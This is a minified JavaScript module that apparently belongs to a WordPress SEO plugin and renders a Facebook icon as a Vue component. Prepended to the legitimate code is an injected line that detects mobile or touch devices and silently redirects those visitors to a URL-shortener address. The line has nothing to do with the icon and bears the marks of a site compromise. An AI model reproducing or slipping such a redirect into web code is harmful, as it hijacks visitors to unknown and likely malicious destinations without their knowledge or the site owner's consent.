(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as t}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as c,j as o}from"./vendor-vue-ui.232c7c36.js";const e={},s={xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",width:"24",height:"24",fill:"none","xmlns:v":"https://vecta.io/nano",class:"aioseo-icon-facebook"};function a(l,n){return r(),c("svg",s,[...n[0]||(n[0]=[o("circle",{cx:"12",cy:"12",r:"12",fill:"#1877f2"},null,-1),o("path",{d:"M18 12a6.02 6.02 0 0 0-6-6 6.02 6.02 0 0 0-6 6 5.98 5.98 0 0 0 5.025 5.925v-4.2h-1.5V12h1.5v-1.35c0-1.5.9-2.325 2.25-2.325.675 0 1.35.15 1.35.15v1.5h-.75c-.75 0-.975.45-.975.9V12h1.65l-.3 1.725h-1.425V18c3-.45 5.175-3 5.175-6z",fill:"#fff"},null,-1)])])}const f=t(e,[["render",a]]);export{f as S};
